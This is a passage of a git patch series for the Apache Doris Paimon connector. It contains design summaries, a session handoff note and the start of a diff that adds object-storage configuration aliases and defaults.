b/plan-doc/FIX-INCR-SCAN-RESET-summary.md new file mode 100644 index 00000000000000..752a79ca700d51 --- /dev/null +++ b/plan-doc/FIX-INCR-SCAN-RESET-summary.md @@ -0,0 +1,58 @@ +# FIX-INCR-SCAN-RESET — Summary + +> P2-1 (MAJOR). Commit `f08bc22b9bd`. Connector-only (no SPI / no BE). Design: +> `FIX-INCR-SCAN-RESET-design.md`. Pre-coding design red-team: `wf_ffd11631-ed2` (DESIGN-SOUND). + +## Problem +A Paimon `@incr(...)` read can return the wrong rows — or hard-fail — when the base table **persists** +a `scan.snapshot-id` / `scan.mode` option (legal & mutable via `ALTER TABLE SET`, `TBLPROPERTIES`, or +`table-default.*` catalog options). + +## Root Cause +`PaimonIncrementalScanParams.validate()` deliberately **stripped** legacy's defensive null-reset of +`scan.snapshot-id` / `scan.mode` (legacy `PaimonScanNode.validateIncrementalReadParams:842-843,846`, +applied via `baseTable.copy(...)` `:896`), justified by a **wrong** rationale ("a fresh per-query `Table` +can't inherit `scan.*`"). The table options come from the **persisted** `TableSchema`, so a stale +`scan.snapshot-id` is present on every fresh load. Without the reset, `resolveScanTable`'s +`Table.copy(scanOptions)` merges the stale `scan.snapshot-id` with `incremental-between`; paimon 1.3.1 then +either **throws** (`IllegalArgumentException: "[incremental-between] must be null when you set +[scan.snapshot-id,scan.tag-name]"`) or **silently** resolves to `FROM_SNAPSHOT` at the stale id (wrong +`@incr` rows, and a wrong pinned schema via `tryTimeTravel`). + +## Fix +**Option 2** (unanimous red-team pick; keeps the shared SPI null-free, surgical): +- New `PaimonIncrementalScanParams.applyResetsIfIncremental(scanOptions)` — gated on the presence of + `incremental-between` / `incremental-between-timestamp`, returns a fresh map seeded with + `scan.snapshot-id=null` + `scan.mode=null` then the original options; otherwise returns the input + unchanged (no false positive on a genuine snapshot/tag pin). Uses the class's existing key constants + (no literals → no detector drift). Strict legacy parity: only those two keys. +- `PaimonScanPlanProvider.resolveScanTable` wraps the `Table.copy(...)` argument with the helper — one edit + covers **both** callers (native/JNI scan `planScanInternal` + JNI serialized-table `getScanNodeProperties`) + through the single chokepoint. The null values are created locally and consumed immediately by paimon's + `copyInternal` (`v == null ? options.remove(k) : options.put(k, v)`) — never stored, serialized, or placed + in `ConnectorMvccSnapshot`. +- `validate()` is unchanged (still null-free), so the shared `ConnectorMvccSnapshot` SPI contract and the + two existing "no-null" tests stay intact. Corrected the now-refuted "byte-parity on a freshly-loaded base" + rationale in `PaimonIncrementalScanParams` javadoc/inline, `PaimonConnectorMetadata` INCREMENTAL comment, + and the two existing tests' WHY-comments (assertions unchanged). + +### Why not Option 1 (re-emit nulls through the SPI) +Mechanically works, but breaks the shared `ConnectorMvccSnapshot` null-free contract (future iceberg/hudi), +depends on a silent gap in `Builder.properties(Map)` that a future null-hardening would re-break, and would +invert two green tests + the `getProperties()` javadoc. Same engine behavior, none of that. + +## Tests +- `PaimonScanPlanProviderTest.resolveScanTableResetsStalePinForIncrementalRead` (**NEW**, real + `FileSystemCatalog` table with a persisted `scan.snapshot-id`) — **proven fail-before** (neutered fix → + `IllegalArgumentException` at the `resolveScanTable` call) / pass-after. +- `PaimonIncrementalScanParamsTest` **+4** unit tests (helper seeds the resets for snapshot & timestamp + windows; passes non-incremental pins through unchanged; no-op for empty/null); reworded the keep-null-free + `validate()` test (assertions unchanged). +- `PaimonConnectorMetadataMvccTest` — reworded the refuted WHY-comment (assertions unchanged). + +## Result +- Connector suites green: `PaimonIncrementalScanParamsTest` 20/0/0, `PaimonScanPlanProviderTest` 44/0/0, + `PaimonConnectorMetadataMvccTest` 37/0/0. `BUILD SUCCESS`. +- Checkstyle 0 violations; import-gate clean. +- Live `@incr`-over-persisted-`scan.snapshot-id` E2E is **CI-gated** (`enablePaimonTest=false`) — not run + here; noted as gated. diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 0d3533cabc85d2..01be645a1b990f 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,62 +5,70 @@ --- -# 🎯 下一个 session 的任务 — **继续逐项实现第三轮 review 修复(FIX-3 起)** +# 🎯 下一个 session 的任务 — **FIX-4 `FIX-FECONF-STORAGE-PARITY`(FE-config FULL legacy parity)** 第三轮 clean-room 对抗 review 转出 4 个 user-approved fix([`task-list-P5-rereview3-fixes.md`](./task-list-P5-rereview3-fixes.md))。 -**FIX-1 与 FIX-2 已完成并独立 commit**;下一步 = 按 task-list **继续 FIX-3 → FIX-4**,每个走 `step-by-step-fix` skill -(design doc → impl → tests → **独立 commit**)。 +**FIX-1 / FIX-2 / FIX-3 已完成并各自独立 commit**;剩 **FIX-4**。每步走 `step-by-step-fix` skill +(design doc → impl → tests → **独立 commit**),design 前建议跑对抗 red-team(FIX-1/FIX-3 亲证有效)。 ## ✅ 已完成(本 session) -- **FIX-1 `FIX-REST-VENDED-URI-NORMALIZE`(P9-1 BLOCKER)— commit `c376aba1264`**。REST+native+对象存储读不再抛 - `No storage properties found for schema: oss`。SPI 加 `normalizeStorageUri(uri, token)` overload;fe-core - `DefaultConnectorContext` 抽 `buildVendedStorageMap`(与 `vendStorageCredentials` 单一来源),2-arg override - 用 vended-overlay map normalize(legacy「vended 替换 static」),1-arg delegate(行为不变);连接器 - `PaimonScanPlanProvider` 把 once-per-scan `extractVendedToken(table)` thread 到两个 native normalize 站点。 - 设计前跑了 5-skeptic + completeness-critic 对抗 workflow(DESIGN-SOUND)。 -- **FIX-2 `FIX-JNI-FILE-FORMAT`(P7-1 MAJOR)— commit `2e845e88bf9`**。JNI/count split 不再发 `file_format="jni"`。 - `buildJniScanRange`/`buildCountRange` 改发真 `defaultFileFormat`(`buildCountRange` 加形参+call-site thread); - `PaimonScanRange.Builder` 默认 `"jni"`→`""`。**关键:JNI formatType 由 `paimon.split` 属性存在性 gate,非 - fileFormat 字符串**,故安全。 +- **FIX-3 `FIX-INCR-SCAN-RESET`(P2-1 MAJOR)— commit `f08bc22b9bd`**。@incr 不再因基表持久化的 + stale `scan.snapshot-id`/`scan.mode` 而崩/丢行。**Option 2**:`validate()` 保持 null-free(共享 + `ConnectorMvccSnapshot` SPI 不进 null);两个 null reset 在唯一 `Table.copy` chokepoint + `PaimonScanPlanProvider.resolveScanTable` 经新 `PaimonIncrementalScanParams.applyResetsIfIncremental` + 重新施加(覆盖 native + JNI 两 caller)。paimon `copyInternal` 把 null 当 `options.remove(k)`。 + gate=`incremental-between`/`-timestamp` 存在性(真 snapshot/tag pin 原样放行);严格 legacy parity + 只 reset 两键。**实测失败态是 `copy()` 硬抛 `IllegalArgumentException`(非仅静默丢行)**;real-table 测 + proven fail-before/pass-after。design red-team `wf_ffd11631-ed2`(DESIGN-SOUND)。 + 验证:连接器 20/44/37 绿;checkstyle 0;import-gate 干净。设计/总结见 + `FIX-INCR-SCAN-RESET-design.md` + `-summary.md`。 -## 📋 待修清单(详见 task-list;建议按序) -3. **FIX-3 `FIX-INCR-SCAN-RESET`**(P2-1, MAJOR)— @incr 漏了 legacy 的 `scan.snapshot-id=null`/`scan.mode=null` - 防御性 reset;对持久化 `scan.*` 选项的表会错。**design 须先定**:`ConnectorMvccSnapshot.Builder.property()` - **拒 null** → reset 须直接喂进 `table.copy(scanOptions)` 的 map(可持 key→null),或仅 incremental 路放行 null。 - site:`PaimonIncrementalScanParams.java` + `resolveScanTable`/`applySnapshot`(`table.copy(scanOptions)` 处)。连接器 only。 +## 📋 待修清单(详见 task-list) 4. **FIX-4 `FIX-FECONF-STORAGE-PARITY`**(cluster P8-1/2/3/4·P9-2/3,用户定 **FULL legacy parity**)— - `PaimonCatalogFactory.buildHadoopConfiguration` 从 raw props 重建 Configuration 不全。拆 4 独立 commit: - **4a OSS**(endpoint-from-region+S3A 键)、**4b S3**(path-style+conn/timeout)、**4c COS/OBS**(fs.cosn.*/fs.obs.*+alias)、 - **4d HMS**(hive.metastore.username alias)。连接器 only(禁 import fe-core,literal 复刻 legacy 键逻辑)。 + `PaimonCatalogFactory.buildHadoopConfiguration` 从 raw props 重建 Configuration 不全(filesystem/jdbc/HMS + flavor → catalog/metadata 访问在缺失 backend 上失败)。**连接器 only(禁 import fe-core,literal 复刻 + legacy 键逻辑,同既有 `applyCanonical*` 模式)**。拆 **4 独立 commit**(也可单 commit): + - **4a `FIX-FECONF-OSS`**(P8-1/P8-3):endpoint 缺省时由 region 推 `fs.oss.endpoint` + (`oss-[-internal].aliyuncs.com`,ref legacy `OSSProperties.getOssEndpoint:277-279,314-326`)+ 补 OSS 的 S3A 键(`fs.s3.impl`/`fs.s3a.*`)。 + - **4b `FIX-FECONF-S3`**(P8-2/P9-3):由 `use_path_style`/`s3.path-style-access` 出 `fs.s3a.path.style.access` + conn/timeout 键(MinIO/path-style)。 + - **4c `FIX-FECONF-COS-OBS`**(P9-2):加 `cos.*`/`obs.*` alias 数组 + 出 COS 键(`fs.cosn.impl`/`fs.cosn.userinfo.secretId|secretKey`/`fs.cosn.bucket.region`,ref `COSProperties:174-182`)+ OBS 键(`fs.obs.impl`/`fs.AbstractFileSystem.obs.impl`/`fs.obs.access.key|secret.key`,ref `OBSProperties:194-204`)。 + - **4d `FIX-FECONF-HMS-USER`**(P8-4):`buildHmsHiveConf` 出 `hive.metastore.username` alias(映 `hadoop.username`)。 + 测试 `PaimonCatalogFactoryTest`:每 backend 一例(region-only OSS→`fs.oss.endpoint`;COS→`fs.cosn.*`; + OBS→`fs.obs.*`;S3 path-style;HMS username alias)。**Build:连接器 only**。 ## ⚠️ 关键结论(修复时参照,**勿当先验压制新发现**) -- 本轮唯一 live BLOCKER = P9-1(**已修**)。**P11-1(DATE-epoch prune)是假 BLOCKER**:paimon 走 - `PluginDrivenMvccExternalTable.getNameToPartitionItems` override(解析 rendered name),不走 base raw-epoch 路 → - D-057 的「prune-路 paimon 残留」框定有误,**B8 时 re-scope 到非-paimon 连接器**(task-list Follow-ups)。 -- 翻闸结构性 OK(R-1…R-8)。legacy `datasource/paimon/*` = dead residue,**B8 删除放最后**(FE-config parity - 期间仍需 legacy `*Properties` 作对照)。 +- **P11-1(DATE-epoch prune)是假 BLOCKER**:paimon 走 `PluginDrivenMvccExternalTable.getNameToPartitionItems` + override(解析 rendered name),不走 base raw-epoch 路 → D-057 的「prune-路 paimon 残留」框定有误, + **B8 时 re-scope 到非-paimon 连接器**(task-list Follow-ups)。 +- 翻闸结构性 OK(R-1…R-8)。legacy `datasource/paimon/*` = dead residue,**B8 删除放最后**;FIX-4 期间仍需 + legacy `*Properties`(`OSSProperties`/`COSProperties`/`OBSProperties`/`HMSBaseProperties`)作 literal 复刻对照。 ## 🗺️ 代码脚手架 - **Plugin connector**:`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/` - (flavor/存储装配 `PaimonCatalogFactory.java`[FIX-4];scan `PaimonScanPlanProvider.java`+`PaimonScanRange.java`; - @incr `PaimonIncrementalScanParams.java`[FIX-3])。`-api`/`-backend-*` 模块在 git 内为空壳。 + (**flavor/存储装配 `PaimonCatalogFactory.java`[FIX-4]**:`buildHadoopConfiguration:390-394`、 + `applyStorageConfig:412-426`、`applyCanonicalS3Config:437-465`、`applyCanonicalOssConfig:475-499`、 + alias 数组 `:87-106`、`buildHmsHiveConf`;scan `PaimonScanPlanProvider.java`+`PaimonScanRange.java`; + @incr `PaimonIncrementalScanParams.java`)。`-api`/`-backend-*` 模块在 git 内为空壳。 - **fe-core 桥/SPI**:`fe/fe-core/.../connector/DefaultConnectorContext.java`、`.../datasource/PluginDriven*.java`; SPI `fe/fe-connector/fe-connector-{api,spi}/`。 -- **Legacy 对照基准(仍在树内,勿删)**:`fe/fe-core/.../datasource/paimon/`(`source/PaimonScanNode.java`、 - `PaimonUtil.java`、property `OSSProperties/COSProperties/OBSProperties`、`PaimonRestMetaStoreProperties` 等)。 -- **BE 消费端**:`be/src/format/table/`(`paimon_cpp_reader.cpp`[FILE_FORMAT/MANIFEST_FORMAT backfill :397-411]、 - `paimon_reader.cpp`、`partition_column_filler.h`)。 +- **Legacy 对照基准(仍在树内,勿删;FIX-4 literal 复刻源)**:`fe/fe-core/.../datasource/property/storage/` + 下 `OSSProperties`/`COSProperties`/`OBSProperties`/`HMSBaseProperties`(grep 确认实际路径); + `fe/fe-core/.../datasource/paimon/`(`source/PaimonScanNode.java`、`PaimonUtil.java`、 + `PaimonRestMetaStoreProperties` 等)。 +- **BE 消费端**:`be/src/format/table/`(`paimon_cpp_reader.cpp`、`paimon_reader.cpp`、`partition_column_filler.h`)。 --- # 📦 仓库状态 -- **HEAD = `2e845e88bf9`(FIX-2)**。迁移链:…→`199485bbde9`(round-3 review 任务)→`c376aba1264`(FIX-1)→**`2e845e88bf9`(FIX-2, HEAD)**。 - 本 session 后另有一个 `docs:` 提(滚 HANDOFF + task-list FIX-1/2 勾掉)。 +- **HEAD = `f08bc22b9bd`(FIX-3)**。迁移链:…→`c376aba1264`(FIX-1)→`2e845e88bf9`(FIX-2)→ + `1b2b4236db3`(docs)→**`f08bc22b9bd`(FIX-3, HEAD)**。本 session 后另有一个 `docs:` 提 + (滚 HANDOFF + task-list 勾 FIX-3 + 加 `FIX-INCR-SCAN-RESET-summary.md`)。 - ⚠️ `regression-test/conf/regression-conf.groovy` 仍 modified 未 commit 且含**明文 Aliyun key** —— commit 前继续 path-whitelist,**严禁 `git add -A`**;`regression-conf.groovy.bak` 同理排除。 -- 未 commit/未跟踪:scratch(`.audit-scratch/` `conf.cmy/` `META-INF/`);`plan-doc/reviews/P5-paimon-rereview3-2026-06-12.md` - (第三轮 review 报告,未跟踪——大文件,下次方便时 vet+commit 或保留本地)。 -- 当前分支 `catalog-spi-07-paimon`(非 `master`)。**无 P0~P4 阻塞遗留**;P9-1 BLOCKER 已清。 +- 未 commit/未跟踪:scratch(`.audit-scratch/` `conf.cmy/` `META-INF/`); + `plan-doc/reviews/P5-paimon-rereview3-2026-06-12.md`(第三轮 review 报告,未跟踪——大文件,下次方便时 + vet+commit 或保留本地)。 +- 当前分支 `catalog-spi-07-paimon`(非 `master`)。**无 P0~P4 阻塞遗留**;P9-1 BLOCKER 已清;P2-1 已清。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` @@ -70,22 +78,27 @@ ## ⚙️ 操作须知(复用) - maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false - -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。改 fe-core `-pl :fe-core -am`; - 改 SPI `-pl :fe-connector-api`/`:fe-connector-spi -am`。**checkstyle**:连接器 `mvn -pl :fe-connector-paimon - checkstyle:check`;fe-core `mvn -pl :fe-core checkstyle:check`。 + -DfailIfNoTests=false`;验证读 surefire XML + `BUILD SUCCESS`/`MVN_EXIT`([[doris-build-verify-gotchas]])。 + **漏 `-am` → `could not resolve fe-connector-spi ${revision}` 假错**(FIX-3 fail-before 验证亲证)。改 SPI + `-pl :fe-connector-api`/`:fe-connector-spi -am`。**checkstyle**:连接器 + `mvn -f …/fe/pom.xml -pl :fe-connector-paimon -am checkstyle:check`。 - 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE 单测。harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/ - `PaimonScanPlanProviderTest`(real-table `FileSystemCatalog` 取真 DataSplit)/`PaimonIncrementalScanParamsTest`[FIX-3]/ - `PaimonCatalogFactoryTest`[FIX-4]/`DefaultConnectorContextNormalizeUriTest`(fe-core)。live-e2e CI-gated - (`enablePaimonTest` 默认 false)→ 注明 gated,勿谎称跑过。 +- 测试优先 runnable FE 单测。harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable` + (注意 `FakePaimonTable.copy` 是 no-op recorder,不能当 reset/merge 的 fail-before 闸——须 real + `FileSystemCatalog`,见 FIX-3 `resolveScanTableResetsStalePinForIncrementalRead`)/`PaimonScanPlanProviderTest` + (real-table `FileSystemCatalog`)/`PaimonIncrementalScanParamsTest`/`PaimonCatalogFactoryTest`[FIX-4]/ + `DefaultConnectorContextNormalizeUriTest`(fe-core)。live-e2e CI-gated(`enablePaimonTest` 默认 false)→ 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- **逐项修**:一次一个 fix,design→impl→test→commit,别批量糊。每个 fix 的根因/site/legacy 对照/test 都在 +- **逐项修**:一次一个 fix,design→impl→test→commit,别批量糊。各 fix 根因/site/legacy 对照/test 都在 [task-list-P5-rereview3-fixes.md](./task-list-P5-rereview3-fixes.md) + 各 `FIX-*-design.md`。 -- **design 前对抗 verify 见效**(FIX-1 亲证):5-skeptic 各驳一 claim + completeness critic 在写码前抓出 - signature-fanout(`buildNativeRanges` 连带破 2 额外测试点)+ test-double 矛盾(`RecordingConnectorContext` 必 - override 2-arg)。**改 handle/分区/scan 流必 grep 全调用方 + 确认实际实例类(base vs MVCC 子类)。** -- **历史不压制新发现**:P9-1 正是被 DV-025「合理化 defer」却没真修的。 -- 完整背景:报告 `reviews/P5-paimon-rereview3-2026-06-12.md`;memory `catalog-spi-p5-*`(含 - `catalog-spi-p5-fix1-rest-vended-uri`)。 +- **design 前对抗 red-team 见效(FIX-1/FIX-3 亲证)**:5-skeptic 各驳一 claim + completeness critic 在写码前 + 抓出 signature-fanout(FIX-3:`resolveScanTable` 两 caller 共 chokepoint)、test-double 矛盾 + (`FakePaimonTable.copy` 是 no-op→fail-before 须 real table)、framing 纠偏(FIX-3 失败态实为硬抛非静默丢行)。 + **改 handle/分区/scan 流必 grep 全调用方 + 确认实际实例类(base vs MVCC 子类)。** +- **fail-before 闸要真验**:FIX-3 neuter 掉 fix 后跑 real-table 测确认 RED(`IllegalArgumentException`)再恢复 + (verification-before-completion;勿凭「应该会红」自满)。 +- **历史不压制新发现**:P9-1(FIX-1)正是被 DV-025「合理化 defer」却没真修的;P2-1(FIX-3)的 strip 也是被 + 「fresh table 无 inherited scan.*」错误合理化。 +- 完整背景:报告 `reviews/P5-paimon-rereview3-2026-06-12.md`;memory `catalog-spi-p5-*`。 diff --git a/plan-doc/task-list-P5-rereview3-fixes.md b/plan-doc/task-list-P5-rereview3-fixes.md index 31e2ff765eb30e..57ceb612452856 100644 --- a/plan-doc/task-list-P5-rereview3-fixes.md +++ b/plan-doc/task-list-P5-rereview3-fixes.md @@ -80,7 +80,17 @@ instead of `"jni"` (and reconsider the `PaimonScanRange.Builder` default `:244`) **Open (non-blocking)**: BE routing — whether a JNI-tagged split ever reaches the cpp reader vs the JNI reader; fix is correctness-improving regardless. -## ▶ FIX-3 — `FIX-INCR-SCAN-RESET` (P2-1, MAJOR; was NIT in rereview2) — restore parity +## ✅ FIX-3 — `FIX-INCR-SCAN-RESET` (P2-1, MAJOR) — **DONE** (commit `f08bc22b9bd`) +> Design + red-team (DESIGN-SOUND, `wf_ffd11631-ed2`): `FIX-INCR-SCAN-RESET-design.md`; +> `FIX-INCR-SCAN-RESET-summary.md`. **Option 2**: keep `validate()` null-free (shared +> `ConnectorMvccSnapshot` SPI stays null-free); reapply the two null resets at the single `Table.copy` +> chokepoint via new `PaimonIncrementalScanParams.applyResetsIfIncremental(scanOptions)`, called in +> `PaimonScanPlanProvider.resolveScanTable` (covers BOTH callers). paimon `copyInternal` consumes null as +> `options.remove(k)`. Gated on `incremental-between`/`-timestamp` presence (no false positive on a real +> snapshot/tag pin); strict legacy parity (only `scan.snapshot-id` + `scan.mode`). The empirically-verified +> failure mode was a **hard throw** at `copy()` (not just silent wrong rows). Verified: connector +> 20/44/37 green; **real-table test proven fail-before/pass-after** (neuter → `IllegalArgumentException`); +> checkstyle 0; import-gate clean. Live @incr E2E CI-gated. **Next: FIX-4.** **Root cause**: `PaimonIncrementalScanParams.java:222-265` deliberately strips legacy's defensive null-reset (`PAIMON_SCAN_SNAPSHOT_ID=null`, `PAIMON_SCAN_MODE=null`). On a table that **persists** `scan.*` options, the freshly-loaded base table inherits them and they're not reset before the From 8f0ef3d20565ab1fb360127c7c553ea76c01d80f Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 20:16:46 +0800 Subject: [PATCH 042/128] =?UTF-8?q?fix:=20FIX-FECONF-STORAGE-PARITY=20?= =?UTF-8?q?=E2=80=94=20FE-config=20storage=20reconstruction=20full=20legac?= =?UTF-8?q?y=20parity=20(P8-1..4,=20P9-2/3)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: the connector cannot import fe-core, so PaimonCatalogFactory rebuilds the FE-side Hadoop Configuration/HiveConf from raw props with literal key logic. That reconstruction was incomplete vs the legacy *Properties classes, so paimon catalogs on several storage backends failed FE-side catalog/metadata access (the live FileSystemCatalog/HiveCatalog/JdbcCatalog could not resolve the storage FileIO). Solution (connector-only; no fe-core/SPI/BE change): - Extract a shared applyS3aBaseConfig helper (port of AbstractS3CompatibleProperties.appendS3HdfsProperties) taking caller-resolved creds AND the 4 tuning values, so each scheme passes its OWN aliases/defaults. - 4a OSS: derive fs.oss.endpoint from region when blank (oss-[-internal].aliyuncs.com, default -internal, publicAccess from dlf.access.public/dlf.catalog.accessPublic), MOVED from the DLF-local block into the shared OSS block (so filesystem+hms flavors get it too); also emit the S3A base for OSS. Removed the now-dead DLF-local derivation block. - 4b S3: emit fs.s3a.path.style.access + connection.maximum/request.timeout/timeout. Tuning defaults are per-backend: S3=50/3000/1000 (incl AWS_* alias twins), OSS/COS/OBS=100/10000/10000 (a single shared default would silently mis-tune AWS S3). - 4c COS/OBS: new applyCanonicalCosConfig/ObsConfig. Detection mirrors legacy guessIsMe (endpoint/warehouse PATTERN: myqcloud.com / myhuaweicloud.com) OR a cos./obs.-prefixed key, NOT scheme-key-only (a cosn:// catalog configured with only s3.endpoint=cos...myqcloud.com would be missed otherwise). Each emits the S3A base (cosn/obs FS impl is S3AFileSystem, which reads fs.s3a.*) THEN the unconditional fs.cosn.* / fs.obs.* keys; OBS prefers the native OBSFileSystem when classpath-available. - S3 endpoint-from-region (user-approved, same defect class as the OSS P8-1 fix): region-only AWS S3 derives https://s3..amazonaws.com. - 4d HMS username: resolve hadoop.username from firstNonBlank(hive.metastore.username, hadoop.username) (alias priority), run AFTER the storage overlay so the raw hadoop.* passthrough cannot clobber it. - 4e (folded in, pre-existing MAJOR found in impl review): the kerberos block forced hadoop.security.authentication=kerberos before applyStorageConfig, so a kerberized-HMS + simple-HDFS catalog had it clobbered back to simple by the raw hadoop.* passthrough (auth=simple but sasl=true -> broken GSSAPI). Relocated the kerberos block to run AFTER the overlay, mirroring legacy initHadoopAuthenticator-last ordering. Design red-team (wf_a6385c61-669, 5 skeptics + completeness critic) caught the divergent tuning defaults, the endpoint-pattern detection gap, and the unconditional fs.cosn.*/fs.obs.* requirement before coding; impl verification (wf_f90260cb-5e6) confirmed byte-for-byte legacy key/alias/default fidelity and found 4e. Tests: PaimonCatalogFactoryTest +15 (S3 endpoint-from-region, S3 50/3000/1000 tuning, path-style, OSS endpoint-from-region filesystem+hms, OSS S3A base, COS keys + pattern-detect + unconditional region, OBS keys + pattern-detect, no-COS/OBS-for-plain-S3, HMS username alias + priority, kerberos-survives-simple-HDFS). The priority + kerberos tests are RED on the pre-move ordering. Verified: connector 56/0/0 + full module green; checkstyle 0; import-gate clean. Live e2e (paimon_base_filesystem/dlf/hms suites) CI-gated. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonCatalogFactory.java | 262 +++++++++++++++-- .../paimon/PaimonCatalogFactoryTest.java | 277 ++++++++++++++++++ plan-doc/FIX-FECONF-STORAGE-PARITY-design.md | 215 ++++++++++++++ 3 files changed, 731 insertions(+), 23 deletions(-) create mode 100644 plan-doc/FIX-FECONF-STORAGE-PARITY-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index e964b688033ed4..bd38718da6aa73 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -105,12 +105,78 @@ public final class PaimonCatalogFactory { "oss.endpoint", "fs.oss.endpoint"}; private static final String[] OSS_REGION_ALIASES = {"oss.region", "dlf.region"}; + // S3A connection-tuning aliases (ported from each legacy *Properties @ConnectorProperty names). NOTE the + // defaults DIVERGE by backend: S3Properties = 50/3000/1000, while OSS/COS/OBS = 100/10000/10000. Emitting + // one shared default would silently mis-tune AWS S3 (round-3 re-review, FIX-FECONF-STORAGE-PARITY). + private static final String[] S3_MAX_CONN_ALIASES = {"s3.connection.maximum", "AWS_MAX_CONNECTIONS"}; + private static final String[] S3_REQ_TIMEOUT_ALIASES = { + "s3.connection.request.timeout", "AWS_REQUEST_TIMEOUT_MS"}; + private static final String[] S3_CONN_TIMEOUT_ALIASES = {"s3.connection.timeout", "AWS_CONNECTION_TIMEOUT_MS"}; + private static final String[] S3_PATH_STYLE_ALIASES = {"use_path_style", "s3.path-style-access"}; + + private static final String[] OSS_MAX_CONN_ALIASES = {"oss.connection.maximum", "s3.connection.maximum"}; + private static final String[] OSS_REQ_TIMEOUT_ALIASES = { + "oss.connection.request.timeout", "s3.connection.request.timeout"}; + private static final String[] OSS_CONN_TIMEOUT_ALIASES = {"oss.connection.timeout", "s3.connection.timeout"}; + private static final String[] OSS_PATH_STYLE_ALIASES = { + "oss.use_path_style", "use_path_style", "s3.path-style-access"}; + + // COS aliases (ported from COSProperties @ConnectorProperty names). Detection is independent of these + // (cos.* key OR a "myqcloud.com" endpoint/warehouse), so the value lists may safely include the shared + // s3.*/AWS_* aliases legacy COSProperties accepts. + private static final String[] COS_ACCESS_KEY_ALIASES = { + "cos.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY"}; + private static final String[] COS_SECRET_KEY_ALIASES = { + "cos.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY"}; + private static final String[] COS_SESSION_TOKEN_ALIASES = { + "cos.session_token", "s3.session_token", "s3.session-token", "session_token"}; + private static final String[] COS_ENDPOINT_ALIASES = { + "cos.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}; + private static final String[] COS_REGION_ALIASES = { + "cos.region", "s3.region", "AWS_REGION", "region", "REGION"}; + private static final String[] COS_MAX_CONN_ALIASES = {"cos.connection.maximum", "s3.connection.maximum"}; + private static final String[] COS_REQ_TIMEOUT_ALIASES = { + "cos.connection.request.timeout", "s3.connection.request.timeout"}; + private static final String[] COS_CONN_TIMEOUT_ALIASES = {"cos.connection.timeout", "s3.connection.timeout"}; + private static final String[] COS_PATH_STYLE_ALIASES = { + "cos.use_path_style", "use_path_style", "s3.path-style-access"}; + + // OBS aliases (ported from OBSProperties @ConnectorProperty names). + private static final String[] OBS_ACCESS_KEY_ALIASES = { + "obs.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY"}; + private static final String[] OBS_SECRET_KEY_ALIASES = { + "obs.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY"}; + private static final String[] OBS_SESSION_TOKEN_ALIASES = { + "obs.session_token", "s3.session_token", "s3.session-token", "session_token"}; + private static final String[] OBS_ENDPOINT_ALIASES = { + "obs.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}; + private static final String[] OBS_REGION_ALIASES = { + "obs.region", "s3.region", "AWS_REGION", "region", "REGION"}; + private static final String[] OBS_MAX_CONN_ALIASES = {"obs.connection.maximum", "s3.connection.maximum"}; + private static final String[] OBS_REQ_TIMEOUT_ALIASES = { + "obs.connection.request.timeout", "s3.connection.request.timeout"}; + private static final String[] OBS_CONN_TIMEOUT_ALIASES = {"obs.connection.timeout", "s3.connection.timeout"}; + private static final String[] OBS_PATH_STYLE_ALIASES = { + "obs.use_path_style", "use_path_style", "s3.path-style-access"}; + + // Per-backend tuning defaults (legacy *Properties field defaults). + private static final String S3_DEFAULT_MAX_CONN = "50"; + private static final String S3_DEFAULT_REQ_TIMEOUT = "3000"; + private static final String S3_DEFAULT_CONN_TIMEOUT = "1000"; + private static final String OBJ_STORE_DEFAULT_MAX_CONN = "100"; + private static final String OBJ_STORE_DEFAULT_REQ_TIMEOUT = "10000"; + private static final String OBJ_STORE_DEFAULT_CONN_TIMEOUT = "10000"; + private static final String DEFAULT_PATH_STYLE = "false"; + private static final String S3A_IMPL = "org.apache.hadoop.fs.s3a.S3AFileSystem"; private static final String S3A_SIMPLE_CRED_PROVIDER = "org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider"; // JindoOSS impls (literals; avoid the Aliyun compile dep, same pattern as appendDlfOptions). private static final String JINDO_OSS_IMPL = "com.aliyun.jindodata.oss.JindoOssFileSystem"; private static final String JINDO_OSS_ABSTRACT_IMPL = "com.aliyun.jindodata.oss.JindoOSS"; + // Native Huawei OBS impls (literals; avoid the hadoop-obs compile dep). Used only when classpath-available. + private static final String OBS_NATIVE_IMPL = 